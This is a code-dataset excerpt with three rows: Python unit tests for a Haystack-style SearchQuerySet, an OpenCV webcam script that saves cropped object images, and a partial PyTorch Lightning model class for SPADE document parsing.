sqs = self.msqs.set_spelling_query("override")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(sqs.query.spelling_query, "override")
def test_spelling_suggestions(self):
# Test the case where spelling support is disabled.
sqs = self.msqs.filter(content="Indx")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(sqs.spelling_suggestion(), None)
self.assertEqual(sqs.spelling_suggestion("indexy"), None)
def test_raw_search(self):
self.assertEqual(len(self.msqs.raw_search("foo")), 23)
self.assertEqual(
len(
self.msqs.raw_search("(content__exact:hello AND content__exact:world)")
),
23,
)
def test_load_all(self):
# Models with character primary keys.
sqs = SearchQuerySet()
sqs.query.backend = CharPKMockSearchBackend("charpk")
results = sqs.load_all().all()
self.assertEqual(len(results._result_cache), 0)
results._fill_cache(0, 2)
self.assertEqual(
len([result for result in results._result_cache if result is not None]), 2
)
# Models with uuid primary keys.
sqs = SearchQuerySet()
sqs.query.backend = UUIDMockSearchBackend("uuid")
results = sqs.load_all().all()
self.assertEqual(len(results._result_cache), 0)
results._fill_cache(0, 2)
self.assertEqual(
len([result for result in results._result_cache if result is not None]), 2
)
# If nothing is handled, you get nothing.
old_ui = connections["default"]._index
ui = UnifiedIndex()
ui.build(indexes=[])
connections["default"]._index = ui
sqs = self.msqs.load_all()
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs), 0)
connections["default"]._index = old_ui
# For full tests, see the solr_backend.
def test_load_all_read_queryset(self):
# Stow.
old_ui = connections["default"]._index
ui = UnifiedIndex()
gafmmsi = GhettoAFifthMockModelSearchIndex()
ui.build(indexes=[gafmmsi])
connections["default"]._index = ui
gafmmsi.update()
sqs = SearchQuerySet()
results = sqs.load_all().all()
results.query.backend = ReadQuerySetMockSearchBackend("default")
results._fill_cache(0, 2)
# The deleted result isn't returned
self.assertEqual(
len([result for result in results._result_cache if result is not None]), 1
)
# Register a SearchIndex with a read_queryset that returns deleted items
rqstsi = TextReadQuerySetTestSearchIndex()
ui.build(indexes=[rqstsi])
rqstsi.update()
sqs = SearchQuerySet()
results = sqs.load_all().all()
results.query.backend = ReadQuerySetMockSearchBackend("default")
results._fill_cache(0, 2)
# Both the deleted and not deleted items are returned
self.assertEqual(
len([result for result in results._result_cache if result is not None]), 2
)
# Restore.
connections["default"]._index = old_ui
def test_auto_query(self):
sqs = self.msqs.auto_query("test search -stuff")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(
repr(sqs.query.query_filter),
"<SQ: AND content__content=test search -stuff>",
)
sqs = self.msqs.auto_query('test "my thing" search -stuff')
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(
repr(sqs.query.query_filter),
'<SQ: AND content__content=test "my thing" search -stuff>',
)
sqs = self.msqs.auto_query("test \"my thing\" search 'moar quotes' -stuff")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(
repr(sqs.query.query_filter),
"<SQ: AND content__content=test \"my thing\" search 'moar quotes' -stuff>",
)
sqs = self.msqs.auto_query('test "my thing" search \'moar quotes\' "foo -stuff')
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(
repr(sqs.query.query_filter),
'<SQ: AND content__content=test "my thing" search \'moar quotes\' "foo -stuff>',
)
sqs = self.msqs.auto_query("test - stuff")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(
repr(sqs.query.query_filter), "<SQ: AND content__content=test - stuff>"
)
# Ensure bits in exact matches get escaped properly as well.
sqs = self.msqs.auto_query('"pants:rule"')
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(
repr(sqs.query.query_filter), '<SQ: AND content__content="pants:rule">'
)
# Now with a different fieldname
sqs = self.msqs.auto_query("test search -stuff", fieldname="title")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(
repr(sqs.query.query_filter), "<SQ: AND title__content=test search -stuff>"
)
sqs = self.msqs.auto_query('test "my thing" search -stuff', fieldname="title")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(
repr(sqs.query.query_filter),
'<SQ: AND title__content=test "my thing" search -stuff>',
)
def test_count(self):
self.assertEqual(self.msqs.count(), 23)
def test_facet_counts(self):
self.assertEqual(self.msqs.facet_counts(), {})
def test_best_match(self):
self.assertTrue(isinstance(self.msqs.best_match(), SearchResult))
def test_latest(self):
self.assertTrue(isinstance(self.msqs.latest("pub_date"), SearchResult))
def test_more_like_this(self):
mock = MockModel()
mock.id = 1
self.assertEqual(len(self.msqs.more_like_this(mock)), 23)
def test_facets(self):
sqs = self.msqs.facet("foo")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.facets), 1)
sqs2 = self.msqs.facet("foo").facet("bar")
self.assertTrue(isinstance(sqs2, SearchQuerySet))
self.assertEqual(len(sqs2.query.facets), 2)
def test_date_facets(self):
try:
sqs = self.msqs.date_facet(
"foo",
start_date=datetime.date(2008, 2, 25),
end_date=datetime.date(2009, 2, 25),
gap_by="smarblaph",
)
self.fail()
except FacetingError as e:
self.assertEqual(
str(e),
"The gap_by ('smarblaph') must be one of the following: year, month, day, hour, minute, second.",
)
sqs = self.msqs.date_facet(
"foo",
start_date=datetime.date(2008, 2, 25),
end_date=datetime.date(2009, 2, 25),
gap_by="month",
)
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.date_facets), 1)
sqs2 = self.msqs.date_facet(
"foo",
start_date=datetime.date(2008, 2, 25),
end_date=datetime.date(2009, 2, 25),
gap_by="month",
).date_facet(
"bar",
start_date=datetime.date(2007, 2, 25),
end_date=datetime.date(2009, 2, 25),
gap_by="year",
)
self.assertTrue(isinstance(sqs2, SearchQuerySet))
self.assertEqual(len(sqs2.query.date_facets), 2)
def test_query_facets(self):
sqs = self.msqs.query_facet("foo", "[bar TO *]")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.query_facets), 1)
sqs2 = self.msqs.query_facet("foo", "[bar TO *]").query_facet(
"bar", "[100 TO 499]"
)
self.assertTrue(isinstance(sqs2, SearchQuerySet))
self.assertEqual(len(sqs2.query.query_facets), 2)
# Test multiple query facets on a single field
sqs3 = (
self.msqs.query_facet("foo", "[bar TO *]")
.query_facet("bar", "[100 TO 499]")
.query_facet("foo", "[1000 TO 1499]")
)
self.assertTrue(isinstance(sqs3, SearchQuerySet))
self.assertEqual(len(sqs3.query.query_facets), 3)
def test_stats(self):
sqs = self.msqs.stats_facet("foo", "bar")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.stats), 1)
sqs2 = self.msqs.stats_facet("foo", "bar").stats_facet("foo", "baz")
self.assertTrue(isinstance(sqs2, SearchQuerySet))
self.assertEqual(len(sqs2.query.stats), 1)
sqs3 = self.msqs.stats_facet("foo", "bar").stats_facet("moof", "baz")
self.assertTrue(isinstance(sqs3, SearchQuerySet))
self.assertEqual(len(sqs3.query.stats), 2)
def test_narrow(self):
sqs = self.msqs.narrow("foo:moof")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.narrow_queries), 1)
def test_clone(self):
results = self.msqs.filter(foo="bar", foo__lt="10")
clone = results._clone()
self.assertTrue(isinstance(clone, SearchQuerySet))
self.assertEqual(str(clone.query), str(results.query))
self.assertEqual(clone._result_cache, [])
self.assertEqual(clone._result_count, None)
self.assertEqual(clone._cache_full, False)
self.assertEqual(clone._using, results._using)
def test_using(self):
sqs = SearchQuerySet(using="default")
self.assertNotEqual(sqs.query, None)
self.assertEqual(sqs.query._using, "default")
def test_chaining(self):
sqs = self.msqs.filter(content="foo")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.query_filter), 1)
# A second instance should inherit none of the changes from above.
sqs = self.msqs.filter(content="bar")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.query_filter), 1)
def test_none(self):
sqs = self.msqs.none()
self.assertTrue(isinstance(sqs, EmptySearchQuerySet))
self.assertEqual(len(sqs), 0)
def test___and__(self):
sqs1 = self.msqs.filter(content="foo")
sqs2 = self.msqs.filter(content="bar")
sqs = sqs1 & sqs2
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.query_filter), 2)
def test___or__(self):
sqs1 = self.msqs.filter(content="foo")
sqs2 = self.msqs.filter(content="bar")
sqs = sqs1 | sqs2
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.query_filter), 2)
def test_and_or(self):
"""
Combining AND queries with OR should give
AND(OR(a, b), OR(c, d))
"""
sqs1 = self.msqs.filter(content="foo").filter(content="oof")
sqs2 = self.msqs.filter(content="bar").filter(content="rab")
sqs = sqs1 | sqs2
self.assertEqual(sqs.query.query_filter.connector, "OR")
self.assertEqual(
repr(sqs.query.query_filter.children[0]), repr(sqs1.query.query_filter)
)
self.assertEqual(
repr(sqs.query.query_filter.children[1]), repr(sqs2.query.query_filter)
)
def test_or_and(self):
"""
Combining OR queries with AND should give
OR(AND(a, b), AND(c, d))
"""
sqs1 = self.msqs.filter(content="foo").filter_or(content="oof")
sqs2 = self.msqs.filter(content="bar").filter_or(content="rab")
sqs = sqs1 & sqs2
self.assertEqual(sqs.query.query_filter.connector, "AND")
self.assertEqual(
repr(sqs.query.query_filter.children[0]), repr(sqs1.query.query_filter)
)
self.assertEqual(
repr(sqs.query.query_filter.children[1]), repr(sqs2.query.query_filter)
)
class ValuesQuerySetTestCase(SearchQuerySetTestCase):
def test_values_sqs(self):
sqs = self.msqs.auto_query("test").values("id")
self.assert_(isinstance(sqs, ValuesSearchQuerySet))
# We'll do a basic test to confirm that slicing works as expected:
self.assert_(isinstance(sqs[0], dict))
self.assert_(isinstance(sqs[0:5][0], dict))
def test_valueslist_sqs(self):
sqs = self.msqs.auto_query("test").values_list("id")
self.assert_(isinstance(sqs, ValuesListSearchQuerySet))
self.assert_(isinstance(sqs[0], (list, tuple)))
self.assert_(isinstance(sqs[0:1][0], (list, tuple)))
self.assertRaises(
TypeError,
self.msqs.auto_query("test").values_list,
"id",
"score",
flat=True,
)
flat_sqs = self.msqs.auto_query("test").values_list("id", flat=True)
self.assert_(isinstance(sqs, ValuesListSearchQuerySet))
# Note that this will actually be None because a mocked sqs lacks
# anything else:
self.assert_(flat_sqs[0] is None)
self.assert_(flat_sqs[0:1][0] is None)
class EmptySearchQuerySetTestCase(TestCase):
def setUp(self):
super().setUp()
self.esqs = EmptySearchQuerySet()
def test_get_count(self):
self.assertEqual(self.esqs.count(), 0)
self.assertEqual(len(self.esqs.all()), 0)
def test_filter(self):
sqs = self.esqs.filter(content="foo")
self.assertTrue(isinstance(sqs, EmptySearchQuerySet))
self.assertEqual(len(sqs), 0)
def test_exclude(self):
sqs = self.esqs.exclude(content="foo")
self.assertTrue(isinstance(sqs, EmptySearchQuerySet))
self.assertEqual(len(sqs), 0)
def test_slice(self):
sqs = self.esqs.filter(content="foo")
self.assertTrue(isinstance(sqs, EmptySearchQuerySet))
self.assertEqual(len(sqs), 0)
self.assertEqual(sqs[:10], [])
try:
sqs[4]
self.fail()
except IndexError:
pass
def test_dictionary_lookup(self):
"""
Ensure doing a dictionary lookup raises a TypeError so
EmptySearchQuerySets can be used in templates.
"""
self.assertRaises(TypeError, lambda: self.esqs["count"])
@override_settings(DEBUG=True)
class PickleSearchQuerySetTestCase(TestCase):
fixtures = ["base_data"]
def setUp(self):
super().setUp()
# Stow.
self.old_unified_index = connections["default"]._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.cpkmmsi = CharPKMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi, self.cpkmmsi])
connections["default"]._index = self.ui
# Update the "index".
backend = connections["default"].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
self.msqs = SearchQuerySet()
# Stow.
reset_search_queries()
def tearDown(self):
# Restore.
connections["default"]._index = self.old_unified_index
super().tearDown()
def test_pickling(self):
results = self.msqs.all()
for res in results:
# Make sure the cache is full.
pass
in_a_pickle = pickle.dumps(results)
like_a_cuke = pickle.loads(in_a_pickle)
self.assertEqual(len(like_a_cuke), len(results))
self.assertEqual(like_a_cuke[0].id, results[0].id)
| 35.113994 | 171 | 0.613096 |
243b665234a2cae2535cf295fd5d8825846f47f5 | 888 | py | Python | deteccion de objetos/capturaObjetos.py | WilsonOviedo/AI-practica | 316daa55f817f3780d00f6b163b0caac9c961d43 | [
"MIT"
] | null | null | null | deteccion de objetos/capturaObjetos.py | WilsonOviedo/AI-practica | 316daa55f817f3780d00f6b163b0caac9c961d43 | [
"MIT"
] | null | null | null | deteccion de objetos/capturaObjetos.py | WilsonOviedo/AI-practica | 316daa55f817f3780d00f6b163b0caac9c961d43 | [
"MIT"
] | null | null | null | #Fuente https://www.youtube.com/watch?v=v_cwOq06g9E&list=RDCMUCCDvMED1sysAbF5qOfmEw3A&index=3
import cv2
import numpy as np
import imutils
import os
Datos = 'deteccion de objetos\p'
if not os.path.exists(Datos):
print('Carpeta creada: ', Datos)
os.makedirs(Datos)
cap = cv2.VideoCapture(0,cv2.CAP_DSHOW)
x1, y1 = 190, 80
x2, y2 = 450, 398
count = 0
while True:
ret, frame = cap.read()
if ret == False: break
imAux = frame.copy()
cv2.rectangle(frame,(x1,y1),(x2,y2),(255,0,0),2)
objeto = imAux[y1:y2,x1:x2]
objeto = imutils.resize(objeto, width=38)
# print(objeto.shape)
k = cv2.waitKey(1)
if k == ord('s'):
cv2.imwrite(Datos+'/objeto_{}.jpg'.format(count),objeto)
print('Imagen almacenada: ', 'objeto_{}.jpg'.format(count))
count = count + 1
if k == 27:
break
cv2.imshow('frame',frame)
cv2.imshow('objeto',objeto)
cap.release()
cv2.destroyAllWindows() | 19.733333 | 93 | 0.685811 |
67bba1d865301d3711bdbb3fa4a9dc53c0db0bc9 | 26,929 | py | Python | spade/model/model.py | ndgnuh/spade | ed577a1ff80c3bc77540bc6096213ce919858b02 | [
"Apache-2.0"
] | null | null | null | spade/model/model.py | ndgnuh/spade | ed577a1ff80c3bc77540bc6096213ce919858b02 | [
"Apache-2.0"
] | null | null | null | spade/model/model.py | ndgnuh/spade | ed577a1ff80c3bc77540bc6096213ce919858b02 | [
"Apache-2.0"
] | null | null | null | # SPADE
# Copyright (c) 2021-present NAVER Corp.
# Apache License v2.0
import os
import time
from copy import deepcopy
from itertools import zip_longest
from pathlib import Path
from pprint import pprint
from typing import Any, List
import pytorch_lightning as pl
import torch
from pytorch_lightning.utilities import rank_zero_only
import spade.model.model_utils as mu
import spade.utils.analysis_utils as au
import spade.utils.general_utils as gu
from spade.model.metric import SpadeMetric
from spade.model.model_loss import Loss_rt
from spade.model.model_optimizer import get_lr_dict, get_optimizer
from spade.model.model_spade_encoder import SpadeEncoder
from spade.model.model_spade_graph_decoder import gen_parses, pred_label
from spade.model.model_spade_graph_generator import SpadeDecoder
from spade.model.model_utils import RelationTaggerUtils as rtu
class RelationTagger(pl.LightningModule):
# No pool layer
def __init__(self, hparam, tparam, iparam, path_data_folder, verbose=False):
""" """
super().__init__()
self.hparam = hparam
self.tparam = tparam
self.iparam = iparam
self.verbose = verbose
self.task = hparam.task
self.task_lan = hparam.task_lan
self.fields = hparam.fields
self.field_rs = hparam.field_representers
self.n_fields = len(hparam.fields)
self.name = hparam.model_name
self.max_input_len = hparam.max_input_len
self.input_split_overlap_len = hparam.input_split_overlap_len
self.encoder_layer_ids_used_in_decoder = (
hparam.encoder_layer_ids_used_in_decoder
)
self.cross_entropy_loss_weight = torch.tensor(tparam.cross_entropy_loss_weight)
self.validation_top_score = None # the higher, the better
self.encoder_layer = gen_encoder_layer(hparam, path_data_folder) # encoder
self.decoder_layer = gen_decoder_layer(
hparam, self.encoder_layer.transformer_cfg
)
self.spade_metric = SpadeMetric(hparam.n_relation_type, dist_sync_on_step=False)
self.parse_refine_options = {
"refine_parse": self.iparam.refine_parse,
"allow_small_edit_distance": self.iparam.allow_small_edit_distance,
"task_lan": self.task_lan,
"unwanted_fields": self.iparam.unwanted_fields,
}
self.char_for_detokenization = gu.get_char_for_detokenization(
hparam.encoder_backbone_name
)
def forward(
self,
text_tok_ids,
rn_center_x_toks,
rn_center_y_toks,
rn_dist_toks,
rn_angle_toks,
vertical_toks,
char_size_toks,
header_toks,
n_seps,
i_toks,
j_toks,
l_toks,
lmax_toks, # for multi-gpu
lmax_boxes,
):
# splits
header_ori_toks = deepcopy(header_toks)
encoded = self.encoder_forward(
text_tok_ids,
rn_center_x_toks,
rn_center_y_toks,
rn_dist_toks,
rn_angle_toks,
vertical_toks,
char_size_toks,
header_toks,
n_seps,
i_toks,
j_toks,
l_toks,
lmax_toks,
)
# decoding
score = self.decoder_layer(encoded, header_ori_toks, lmax_boxes)
return score
def encoder_forward(
self,
text_tok_ids,
rn_center_x_toks,
rn_center_y_toks,
rn_dist_toks,
rn_angle_toks,
vertical_toks,
char_size_toks,
header_toks,
n_seps,
i_toks,
j_toks,
l_toks,
lmax_toks,
):
# 1. split features that have len > 512
(
text_tok_ids,
rn_center_x_toks,
rn_center_y_toks,
rn_dist_toks,
rn_angle_toks,
vertical_toks,
char_size_toks,
header_toks,
) = rtu.split_features(
n_seps,
i_toks,
j_toks,
self.max_input_len,
text_tok_ids,
rn_center_x_toks,
rn_center_y_toks,
rn_dist_toks,
rn_angle_toks,
vertical_toks,
char_size_toks,
header_toks,
) # [n_sep, batch_size]
# 2. encode each splitted feature
encoded = []
nmax_seps = max(n_seps)
for i_sep in range(nmax_seps):
attention_mask, l_mask = rtu.gen_input_mask(
i_sep, l_toks, i_toks, j_toks, self.max_input_len
)
try:
all_encoder_layer = self.encoder_layer(
text_tok_ids[i_sep],
rn_center_x_toks[i_sep],
rn_center_y_toks[i_sep],
rn_dist_toks[i_sep],
rn_angle_toks[i_sep],
vertical_toks[i_sep],
char_size_toks[i_sep],
header_toks[i_sep],
attention_mask=attention_mask,
)
except RuntimeError:
print(f"i_sep = {i_sep + 1} / n_sep = {nmax_seps}")
print("Fail to encode due to the memory limit.")
print("The encoder output vectors set to zero.")
if i_sep == 0:
print(f"Even single encoding faield!")
raise MemoryError
else:
l_layer = self.encoder_layer.transformer_cfg.num_hidden_layers
all_encoder_layer = [
torch.zeros_like(all_encoder_layer[0]) for _ in range(l_layer)
]
encoded1_part = rtu.get_encoded1_part(
all_encoder_layer,
self.max_input_len,
self.input_split_overlap_len,
n_seps,
i_sep,
i_toks,
j_toks,
l_toks,
self.encoder_layer_ids_used_in_decoder,
)
encoded.append(encoded1_part)
# 3. Combine splited encoder outputs
encoded = rtu.tensorize_encoded(encoded, l_toks, lmax_toks)
return encoded
# @gu.timeit
def _run(self, mode, batch):
# 1. Batchwise collection of features
(
data_ids,
image_urls,
texts,
text_toks,
text_tok_ids,
labels,
label_toks,
rn_center_toks,
rn_dist_toks,
rn_angle_toks,
vertical_toks,
char_size_toks,
header_toks,
) = mu.collect_features_batchwise(batch)
# 2. Calculate length for the padding.
l_boxes = [len(x) for x in texts]
l_tokens = [len(x) for x in text_toks]
if self.hparam.token_lv_boxing:
# Individual units are tokens.
l_units = l_tokens
label_units = label_toks
text_units = text_toks
else:
# Individual units are text segments from OCR-detection-boxes.
l_units = l_boxes
label_units = labels
text_units = texts
# hot-fix
# label_toks include junks when label is None.
if labels[0] is None:
label_units = labels
lmax_boxes = max(l_boxes)
# 3. Split data whose token length > 512
n_seps, i_toks, j_toks, l_toks = rtu.get_split_param(
text_toks,
self.hparam.max_input_len,
self.hparam.input_split_overlap_len,
type_informer_tensor=text_tok_ids[0],
)
# 4. get score
batch_data_in = (
text_tok_ids,
rn_center_toks,
rn_dist_toks,
rn_angle_toks,
vertical_toks,
char_size_toks,
header_toks,
n_seps,
i_toks,
j_toks,
l_toks,
)
score = rtu.get_score(self, batch_data_in, lmax_boxes)
# 5. prediction
pr_label_units = pred_label(
self.task,
score,
self.hparam.inferring_method,
self.n_fields,
l_units,
)
if labels[0] is not None:
# 6. Generate gt parse
parses, f_parses, text_unit_field_labels, f_parse_box_ids = gen_parses(
self.task,
self.fields,
self.field_rs,
text_units,
label_units,
header_toks,
l_max_gen=self.hparam.l_max_gen_of_each_parse,
max_info_depth=self.hparam.max_info_depth,
strict=True,
token_lv_boxing=self.hparam.token_lv_boxing,
backbone_name=self.hparam.encoder_backbone_name,
)
else:
parses = [None] * len(texts)
f_parses = [None] * len(texts)
text_unit_field_labels = [None] * len(texts)
f_parse_box_ids = [None] * len(texts)
# for the speed, set max serialization length small at initial stage.
if mode == "train" and self.current_epoch <= 100:
pr_l_max_gen = 2
else:
pr_l_max_gen = self.hparam.l_max_gen_of_each_parse
# 7. Generate predicted parses
(
pr_parses,
pr_f_parses,
pr_text_unit_field_labels,
pr_f_parse_box_ids,
) = gen_parses(
self.task,
self.fields,
self.field_rs,
text_units,
pr_label_units,
header_toks,
l_max_gen=pr_l_max_gen,
max_info_depth=self.hparam.max_info_depth,
strict=False,
token_lv_boxing=self.hparam.token_lv_boxing,
backbone_name=self.hparam.encoder_backbone_name,
)
results = {
"data_ids": data_ids,
"score": score,
"text_units": text_units,
"label_units": label_units,
"pr_label_units": pr_label_units,
"l_units": l_units,
"parses": parses,
"pr_parses": pr_parses,
"text_unit_field_labels": text_unit_field_labels,
"pr_text_unit_field_labels": pr_text_unit_field_labels,
"f_parse_box_ids": f_parse_box_ids,
"pr_f_parse_box_ids": pr_f_parse_box_ids,
}
return results
def training_step(self, batch, batch_idx):
results = self._run("train", batch)
loss = Loss_rt(
results["score"],
results["label_units"],
self.n_fields,
results["l_units"],
self.cross_entropy_loss_weight,
)
self.log("training_loss", loss, sync_dist=True)
out = {"loss": loss}
if gu.get_local_rank() == 0:
training_out = {
"training_loss": loss,
"data_ids": results["data_ids"],
"parses": results["parses"],
"pr_parses": results["pr_parses"],
"label_units": results["label_units"],
"pr_label_units": results["pr_label_units"],
}
out.update({"training_out": training_out})
return out
def training_epoch_end(self, outputs) -> None:
if gu.get_local_rank() == 0:
losses = [x["loss"] for x in outputs]
avg_loss = torch.mean(torch.stack(losses))
print(f"Training, ave_loss = {avg_loss}")
print(f"Training, gt_parse e.g. {outputs[0]['training_out']['parses'][0]}")
print(
f"Training, pr_parse e.g. {outputs[0]['training_out']['pr_parses'][0]}"
)
print(
f"Epoch {self.current_epoch}, average training loss: {avg_loss.item()}"
)
def validation_step(self, batch, batch_idx):
results = self._run("test", batch)
loss = Loss_rt(
results["score"],
results["label_units"],
self.n_fields,
results["l_units"],
self.cross_entropy_loss_weight,
)
self.log("validation_loss", loss, sync_dist=True)
val_out = {
"data_ids": results["data_ids"],
"loss": loss,
"label_units": results["label_units"],
"pr_label_units": results["pr_label_units"],
"parses": results["parses"],
"pr_parses": results["pr_parses"],
}
(tp_edge, fp_edge, fn_edge, tp_parse, fp_parse, fn_parse) = rtu.count_tp_fn_fp(
self.task,
results["label_units"],
results["pr_label_units"],
"validation",
results["parses"],
results["pr_parses"],
self.parse_refine_options,
)
self.spade_metric.update(
tp_edge, fp_edge, fn_edge, tp_parse, fp_parse, fn_parse
)
return val_out
def validation_epoch_end(self, outputs):
# 1. Reduce validation results
(
precision_edge_avg,
recall_edge_avg,
f1_edge_avg,
precision_parse,
recall_parse,
f1_parse,
) = self.spade_metric.compute()
self.spade_metric.reset()
if gu.get_local_rank() == 0:
(label_units, parses) = rtu.collect_outputs_gt(self.task, outputs)
(_, pr_parses) = rtu.collect_outputs_pr(self.task, outputs)
# 2. Compute validation score
losses = [x["loss"] for x in outputs]
avg_loss = torch.mean(torch.stack(losses))
validation_score_dict = rtu.generate_score_dict(
"validation",
avg_loss,
precision_edge_avg,
recall_edge_avg,
f1_edge_avg,
f1_parse,
)
validation_score = validation_score_dict[
f"validation__{self.tparam.validation_metric}"
]
print(f"Val. metric: {self.tparam.validation_metric}")
print(
f"Val. top score: {self.validation_top_score}, current val. score: {validation_score}"
)
print(f"Epoch: {self.current_epoch}, validation score_dict")
pprint(validation_score_dict)
# 3. Update best validation score
if self.validation_top_score is None:
self.validation_top_score = validation_score
if self.validation_top_score < validation_score:
print(
f"Best score = {validation_score} from epoch {self.current_epoch}"
)
self.validation_top_score = validation_score
path_save_model = Path(self.tparam.path_save_model_dir) / "best"
os.makedirs(path_save_model, exist_ok=True)
gu.save_pytorch_model(path_save_model, self)
if (
self.current_epoch % self.tparam.save_epoch_interval == 0
and self.current_epoch > 0
):
path_save_model = (
Path(self.tparam.path_save_model_dir) / str(self.current_epoch)
)
os.makedirs(path_save_model, exist_ok=True)
gu.save_pytorch_model(path_save_model, self)
if self.verbose:
if self.current_epoch != 0:
print(f"Validation result at epoch {self.current_epoch}")
print(f"{validation_score_dict}")
rtu.print_parsing_result(parses, pr_parses)
def configure_optimizers(self):
optimizer = get_optimizer(self.tparam, self)
lr_dict = get_lr_dict(optimizer, self.tparam)
return {"optimizer": optimizer, "lr_scheduler": lr_dict}
def test_step(self, batch, batch_idx, dataset_idx):
results = self._run("test", batch)
if results["label_units"][0] is None: # parse ocr results
loss = -1
else:
loss = Loss_rt(
results["score"],
results["label_units"],
self.n_fields,
results["l_units"],
self.cross_entropy_loss_weight,
)
test_out = {
"dataset_idx": dataset_idx,
"loss": loss,
"data_ids": results["data_ids"],
"label_units": results["label_units"],
"pr_label_units": results["pr_label_units"],
"parses": results["parses"],
"pr_parses": results["pr_parses"],
"text_unit_field_labels": results["text_unit_field_labels"],
"pr_text_unit_field_labels": results["pr_text_unit_field_labels"],
"f_parse_box_ids": results["f_parse_box_ids"],
"pr_f_parse_box_ids": results["pr_f_parse_box_ids"],
}
(tp_edge, fp_edge, fn_edge, tp_parse, fp_parse, fn_parse) = rtu.count_tp_fn_fp(
self.task,
results["label_units"],
results["pr_label_units"],
"test",
results["parses"],
results["pr_parses"],
self.parse_refine_options,
)
self.spade_metric.update(
tp_edge, fp_edge, fn_edge, tp_parse, fp_parse, fn_parse
)
return test_out
@rank_zero_only
def test_epoch_end(self, outputs: List[Any]) -> None:
if self.hparam.task == "receipt_v1":
self.test_epoch_end_receipt_v1(outputs)
elif self.hparam.task == "funsd":
self.test_epoch_end_funsd(outputs)
else:
raise NotImplementedError
@rank_zero_only
@gu.timeit
def predict_step(self, batch, batch_idx, dataset_idx):
results = self._run("test", batch)
assert len(results["data_ids"]) == 1
test_out = {
"data_id": results["data_ids"][0],
"text_unit": results["text_units"][0],
"pr_parse": results["pr_parses"][0],
"pr_label": results["pr_label_units"][0],
"pr_text_unit_field_label": results["pr_text_unit_field_labels"][0],
}
return test_out
def test_epoch_end_funsd(self, outputs):
test_types = ["dev", "test"]
for i, (test_type, outputs_each_dataloader) in enumerate(
zip_longest(test_types, outputs)
):
if i == 0:
continue # dev == test in funsd case.
# 1. Collect required features from the outputs
losses = [x["loss"] for x in outputs_each_dataloader]
avg_loss = torch.mean(torch.stack(losses))
(
label_units,
parses,
text_unit_field_labels,
f_parse_box_ids,
) = rtu.collect_outputs_gt(
self.task, outputs_each_dataloader, return_aux=True
)
label_units = [x.cpu().numpy() for x in label_units]
(
pr_label_units,
pr_parses,
pr_text_unit_field_labels,
pr_f_parse_box_ids,
) = rtu.collect_outputs_pr(
self.task, outputs_each_dataloader, return_aux=True
)
# 2. Calculate score
# 2.1 Calculate without the field header indicators.
tp_edge, fn_edge, fp_edge = au.cal_tp_fn_fp_of_edges(
label_units, pr_label_units
)
p_edge, r_edge, f1_edge = au.cal_p_r_f1(tp_edge, fn_edge, fp_edge)
f1, parse_stat, card_stat, corrects_parse = rtu.cal_f1_scores(
self.task, "test", parses, pr_parses, self.parse_refine_options
)
fields_of_interest = [
"header.header",
"qa.question",
"qa.answer",
"other.other",
]
# 2.2 Calculate with the field header indicators.
(
header_id_of_entities,
header_label_of_entities,
) = au.extract_header_id_of_entities(f_parse_box_ids)
text_unit_field_label_subs = au.get_headers_of(
header_id_of_entities, text_unit_field_labels
)
pr_text_unit_field_label_subs = au.get_headers_of(
header_id_of_entities, pr_text_unit_field_labels
)
tp_fn_fp_all_entity = au.get_tp_fn_fp_all(
text_unit_field_label_subs,
pr_text_unit_field_label_subs,
fields_of_interest,
)
# 2.2.1 Calculate F1 for ELB task.
p_r_f1_entity, p_r_f1_all_entity = au.get_p_r_f1_entity(
tp_fn_fp_all_entity, fields_of_interest
)
# 2.2.2 Calculate F1 for ELK task.
gt_links = au.extract_links(self.fields, label_units, target_label_id=1)
pr_links = au.extract_links(self.fields, pr_label_units, target_label_id=1)
pr_links_filtered = au.filter_non_header_id(
pr_links, header_id_of_entities, gt=False
)
p_r_f1_link = au.get_p_r_f1_link(gt_links, pr_links_filtered)
test_score_dict = rtu.generate_score_dict(
test_type, avg_loss, p_edge, r_edge, f1_edge, f1, is_tensor=False
)
test_score_dict.update(
{
"p_r_f1_entity": p_r_f1_entity,
"p_r_f1_all_entity_ELB": p_r_f1_all_entity, # ELB
"p_r_f1_link_ELK": p_r_f1_link, # ELK
}
)
# 3. Save analysis results
path_analysis_dir = Path(self.hparam.path_analysis_dir)
rtu.save_analysis_results(
path_analysis_dir,
test_type,
test_score_dict,
parse_stat,
card_stat,
corrects_parse,
parses,
pr_parses,
)
def test_epoch_end_receipt_v1(self, outputs):
test_types = ["dev", "test", "ocr_dev", "ocr_test"]
parsess = []
data_idss = []
ave_losses = []
for i, (test_type, outputs_each_dataloader) in enumerate(
zip_longest(test_types, outputs)
):
# 1. Collect required results from the outputs
data_ids = rtu.gather_values_from_step_outputs(
outputs_each_dataloader, "data_ids"
)
(pr_label_units, pr_parses) = rtu.collect_outputs_pr(
self.task, outputs_each_dataloader
)
if i <= 1:
# dev, test
losses = [x["loss"] for x in outputs_each_dataloader]
